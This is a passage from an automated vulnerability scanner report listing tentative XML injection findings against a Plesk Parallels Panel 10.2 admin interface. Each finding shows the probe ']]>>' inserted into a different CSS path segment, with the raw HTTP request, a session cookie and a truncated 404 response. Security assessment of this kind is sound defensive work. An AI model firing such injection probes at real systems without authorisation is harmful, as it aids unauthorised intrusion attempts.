Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.64. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/main.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/admin/main.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css/admin]]>>/main.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:24 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.65. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/main.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/admin/main.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css/admin/main.css]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:27 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.66. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/base.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/base.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/css/common/base.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:38 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.67. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/base.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/base.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/css/common/base.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:44 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.68. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/base.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/base.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css]]>>/common/base.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:51 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.69. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/base.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/base.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css/common]]>>/base.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:57 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.70. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/base.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/base.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css/common/base.css]]>>?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:26:04 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.71. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/btns.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/btns.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/css/common/btns.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:29 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.72. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/btns.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/btns.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/css/common/btns.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:35 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.73. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/btns.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/btns.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css]]>>/common/btns.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:42 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.74. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/btns.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/btns.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css/common]]>>/btns.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:48 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.75. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/btns.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/btns.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css/common/btns.css]]>>?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:25:54 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.76. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/double-list-selector.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/double-list-selector.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/css/common/double-list-selector.css?1297230722 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:59:36 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.77. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/double-list-selector.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/double-list-selector.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/css/common/double-list-selector.css?1297230722 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:59:38 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.78. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/double-list-selector.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/double-list-selector.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css]]>>/common/double-list-selector.css?1297230722 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:59:40 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.79. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/double-list-selector.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/double-list-selector.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css/common]]>>/double-list-selector.css?1297230722 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:59:42 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.80. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/double-list-selector.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/double-list-selector.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/css/common/double-list-selector.css]]>>?1297230722 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:59:44 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.81. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/ie.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/css/common/ie.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/css/common/ie.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:18 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.82. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/ie.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
